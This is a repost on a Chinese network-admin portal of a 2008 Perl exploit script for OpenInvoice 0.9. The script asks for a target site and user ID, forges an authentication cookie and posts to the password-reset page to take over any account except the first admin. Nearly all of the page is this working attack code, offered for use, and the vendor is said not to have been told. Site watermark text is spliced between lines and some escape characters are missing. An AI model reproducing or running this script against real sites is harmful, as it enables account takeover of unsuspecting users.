网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > Exploit > OpenInvoice 0.9 Arbitrary Change User Password Exploit  

OpenInvoice 0.9 Arbitrary Change User Password Exploit

2008-04-21  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

#!/usr/bin/perl

# [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ]
# Discovered && Coded By t0pP8uZz
# Discovered On: 18 April 2008
# Vendor has not been notified!
网管论坛bbs_bitsCN_com

# see exploit for more details..

中国网管论坛bbs.bitsCN.com

# Greetz: , h4ck-y0u.org, CipherCrew! 网管联盟bitsCN@com

use strict;
use LWP::UserAgent;
use HTTP::Cookies;

中国网管论坛bbs.bitsCN.com

print "-+- [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ] -+-n";
print "-+-             (Discovered && Coded By t0pP8uZz)              -+-n";
print "-+-                                                            -+-n";
print "-+-   Discovered On: 18 April 2008 / Discovered By: t0pP8uZz   -+-n";
print "-+- OpenInvoice 0.9 beta (and prior) Suffers from Insecure ... -+-n";
print "-+- ...cookies and admin panel validating, combining the two.. -+-n";

网管u家bitscn.net

print "-+- .we can change any users password except for the 1st admin -+-n";
print "-+-                                                            -+-n";
print "-+- [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ] -+-n";
网管bitscn_com

print "nEnter URL (the vuln site): ";
 chomp(my $url=<STDIN>);
 
print "nEnter UID (the user id to change pass for): ";
 chomp(my $uid=<STDIN>);
 
my $domain = $url;
my $count = ($domain =~ tr"/"");

网管网www_bitscn_com

if($count == 1) {
 $domain =~ s/\//;
} elsif($count >= 3) {
 $domain =~ s/http:////;
}

网管联盟bitsCN_com

my $cjar = HTTP::Cookies->new( file => "cookies.txt", autosave => 1 );
$cjar->set_cookie(1, "oiauth", "1", "/", "6oogle.pl");
$cjar->save("cookies.txt");
网管有家www.bitscn.net

my $ua     = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1 )', cookie_jar => $cjar );
my $result = $ua->post($url."/resetpass.php", { 'uid' => $uid, 'changepass' => 'Change Password' } );
网管有家bitscn.net

if($result->is_success() && $result->content !~ /unable to change password/i && $uid != 1) {
 print "Password successfuly changed for userid: ".$uid."n";
 exit;
}
print "Exploit Failed! check domain is running OpenInvoice <= 0.9, Check UID isnt 1n";
exit;

网管朋友网www_bitscn_net


TAGs         "   print   -n"   &   >   my   OpenInvoice      
 上一篇:DivX Player 6.6.0 SRT File SEH Buffer Overflow Exploit   下一篇:PHP-Fusion 6.00.307 Remote Blind SQL Injection Exploit
OpenInvoice 0.9 Arbitrary Change User Password Exploit 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: